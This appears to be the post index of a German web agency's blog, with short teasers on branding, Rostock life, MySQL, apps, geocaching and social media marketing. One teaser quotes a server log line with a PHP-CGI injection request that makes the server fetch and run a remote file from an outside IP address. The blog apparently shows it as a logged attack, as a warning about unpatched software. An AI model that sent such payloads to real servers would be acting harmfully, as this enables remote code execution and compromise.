Twitter’s new logo, simplicity and clearity

Twitter hat sein „Vögelein“ Logo überarbeitet, und es nun als eigenständiges Signet für den Firmenauftritt festgelegt.
Der Verzicht auf erklärende kleine „t“s, bubble Fonts und weiteren Text, um die Marke zu representieren…. Mehr

A-ROSA relaunch 2012

Die A-ROSA Flusskreuzfahrten aus Rostock feiert in diesem Jahr ihr 10 jähriges Bestehen, stellt im Juli ihr zehntes Schiff A-ROSA SILVA vor und überführt es von Warnemünde in die Niederlande für den zukünftigen Einsatz auf dem Rhein…. Mehr

eGovernment at its best

Heute morgen im Ortsamt Mitte zu Rostock:
Zwei der ca. 12 Bildschirmarbeitsplätze mucken, ein HelpDeskler wuselt herum.
„Ausschalten und danach wieder einschalten“ halt es durch den Raum; „Wackel mal am Kabel!“ möchte man ergänzen…. Mehr

„Jeder Urheber kann eigentlich von seiner Arbeit leben“

Erste Aussage: Der Alleinstellungs-Anspruch, der von den literarischen Wutbürgern von Daniel Kehlmann , Felicitas Hoppe und Roger Willemsen über Michael Lentz und Charlotte Roche bis hin zu Sarah Ines Struck, Sylvia Frevert und Tilmann Spengler unter der Überschrift Wir sind die Urheber! Gegen den Diebstahl geistigen Eigentums initiiert worden ist, ist natürlich Anmaßung. Denn DIE Urheber sind sie nicht…. Mehr

Was will uns der Autor damit sagen?

213.152.180.178 - - [30/May/2012:18:07:04 +0200] "POST /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F81.17.24.83%2Fsend.txt HTTP/1.1" 200 7527 "-" "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:15.0) Gecko/20120427 Firefox/15.0a1"

Software ohne Updates = potentieller Zombie

Howto rotate MySQL Columns to Rows, extract

Problem: Vergangenheitsinformationen und Zukunftsinformationen in getrennten Tabellen sollen in einer Ansicht zusammengefaßt werden, ohne persistierende Zwischenschicht und unter Beibehaltung der Indizierbarkeit. Tabelle A hält 6M Sätze, Tabelle B 100K. Beide Tabellen sind hot und deshalb würde eine persistierende Zwischentabelle eher schmerzen als nützen…. Mehr

Helferlein für den digitalen Alltag

Wer ein FAT-formatiertes Flash-Medium (SD-Card, USB-Stick,…) unter Mac OS X mit audiovisuellem Kram bespielen muss und sich auf dem eigentlichen Zielgerät (Autoradio, Mediaplayer) über die Metadaten-Artefakte des Macs ärgert, kann hier glücklich werden…. Mehr

In den Raum rufen und hoffen, dass es jemanden interessiert …

Instagram installiert, JAKOTA hat getestet. Ein Jahr später, die Freundin Filter auf ihren Bildern haben möchte, fasziniert von den Möglichkeiten. Kein Problem, hab ja noch den alten Account, nimm den. Skeptischer Blick und die Frage nach dem Sinn eines Accounts für das blosse Machen von Bildern mit „Frag nicht!“ abwiegelnd. Als Herr über Datenbanken und Server natürlich darüber im Bilde, dass man Instagram dann auf „privat“ stellen sollte, damit die peinlichen Bilder einer bilderschießwütigen Frau von ihrem nackten, Melone futterndem Typ (ich) nicht das Internet verunreinigen…. Mehr

Dienstwagen-Affäre


Globalisierung und ein blinder Fleck auf dem Auge des Controllings bescherten uns ein neues Gefährt, das wir fortan für kleine Erledigungen im näheren Umkreis des Hauptquartiers benutzen werden…. Mehr

Sonnenanbeter …


Die einzig brauchbare Religion. :)

„Soweit ich mich erinnere, sind wir immer arm gewesen“

c Gerhard Kemme

in der aktuellen Ausgabe von brand eins, Schwerpunkt Kapitalismus, ist ein erholsamer Artikel von Peter Lau über den Hamburger Stadtteil Osdorfer Born. Ein sozialer Brennpunkt, in dem der Autor selbst aufgewachsen ist…. Mehr

Errors are human, oder auch die grosse Maschine macht Fehler

ob das mit dem heutigen Freitag dem 13. zusammenhängt, lässt sich erst morgen feststellen :-)
Der benutzte WeissRaum dieser Seite ist schlicht herrlich ! Fehlt nur noch der Arial/Helvetica Verzicht.

prove yourself here: http://code.google.com/p/sumatrapdf/wiki/toolbardesign

Endlich Frühling in Rostock, jetzt mit Design-Säulen.

Die KTV zeigt in einer OpenAirAusstellung neue Blumensäulen und zaubert uns ein Lächeln ins Gesicht.

Wer immer hier aktiv geworden ist, feine Idee, die tut nicht weh. Giesser mögen sich erbarmen. Auch wir haben schon Patenschaft für obige Gewächse übernommen.
Sicher gibt es einen politischen Hintergrund, ergeben sich doch durch die Stickernähe… jede Menge Gedankenzusammenhänge. :-)…Ausgedichtet.
research:
http://www.google.de
http://www.das-ist-rostock.de/
http://www.gruene-mv.de/

Wärmepumpensteuerung über den Browser

Die Browser werden leistungsfähiger, Internetseiten haben bereits meinen E-Mail Client und meinen Kalender abgelöst. Auch das Spielen im Browser ohne ein extra Plugins ist bereits Realität. Natürlich können wir interaktive Interfaces zur Kontrolle und Steuerung zum Beispiel einer Wärmepumpe auch als Browser-Anwendung gestalten. … Mehr

nPA – P.S.: You guys aren’t friends


Ich hab es echt versucht. Bin ja schließlich Fachinformatiker und hantiere jeden Tag beruflich und Privat mit Rechentechnik aller Art. Der neue Personalausweis (nPA) ist ja für alle Bürger, auch für Menschen ohne ein Informatikdiplom. Das wird ja kein Problem. Dachte ich…. Mehr

Native App-Entwicklung bei JAKOTA

Eins vorweg: Gekapselte HTML Container „App“ zu nennen, sei uns hier nicht erlaubt, das wäre Sand streuen… Diese Überschrift sollte eigentlich „Native iOS-Entwicklung bei JAKOTA“ heißen. Aber neben dem rein informativen Charakter geht es in einem „corporate blog“ auch immer ums Trommeln und momentan sind wir wahrnehmungstechnisch im Zeitalter der „App“*…. Mehr

Got the next iPad?

Which one did you get?
I got the „new new iPad“.
Oh, I have the „iPad before the next to the last iPad.“

read:
http://www.fastcocreate.com/1680086/forget-the-ipad-3-the-smart-branding-move-behind-apples-new-ipad

Lost Places – Entdeckungen dank Geocaching

Seit Sommer letzen Jahres bin ich dem Geocaching verfallen. Angefangen hat alles quasi mit einem kaputten iPhone. Ein Ersatzhandy musste her. Da ich jetzt nach 4 Jahren iOS mal etwas anderes probieren wollte entschied ich mit für ein Android Gerät. Zuhause angekommen, wurden unmengen Apps getestet. Dabei fand ich g:geo. Geocaching hatte ich schon mal gehört aber kaum beachtet. Doch die App hatte mich wieder auf das Thema aufmerksam gemacht. Schnell einen Account angelegt und mal geguckt was so in meiner Umgebung los ist. Ich hatte vielleicht mit  1-2 sogenannten Caches, also verstecke die es zu finden gilt, gerechnet…. Mehr

Social Marketing und Facebook CMS für die BINZ-THERME

jakota facebook cms binz therme

Laut Analysten wird davon ausgegangen, dass Facebook noch in diesem Jahr eine Milliarde Nutzer erreichen kann.
Für Unternehmen Grund genug, sich auch auf diesem Markt zu präsentieren. Wer seinen Besuchern und Followern neben den Standard-Funktionen von Facebook etwas mehr zeigen möchte, kann wie im Fall der Seehotel BINZ-THERME eine umfangreiche Präsentation anbieten und dabei im Social Umfeld Kundenkontakte aufbauen.

JAKOTA konzipierte eine App, die als Microsite der Seehotel-Webseite umgesetzt wurde. Hier werden ausgesuchte Inhalte auch außerhalb der Webseite kommuniziert. Die Verwaltung geschieht bequem per CMS (Content Management System). Kunden mit eigenem CMS können dieses weiter zur Verwaltung auch der Facebook App nutzen und müssen sich an keine neue Umgebung gewöhnen.
JAKOTA bietet seinen Kunden strategische Beratung und die Umsetzungskompetenz für das Marketing auch im Social Media Bereich.

Zur Facebook App des Seehotel BINZ-THERME…

Der Social-Media-Rausch und die SEO Blender

„Social Media für Chefs“, „Social Media für Unternehmen“ und so ähnlich
lauten die Titel für vielversprechende Keynotes, Workshops und Seminare.

Kunden aufgepasst – denn unter den zahlreichen charmanten Dienstleistern, die mit Ihnen Ihre soziale Unternehmenszukunft gestalten möchten sind auch viele Blender.
Doch wie unterscheidet man seriöse Helfer von Wunderheilern und Scheinexperten? Wie finde ich zu meinem Unternehmen und Business die passende Social Media-Dienstleistung? JAKOTA fragen? Ja das ist ein Ansatz, optimieren wir doch seit Jahren die Wahrnehmung unserer Kunden…. Mehr

Inside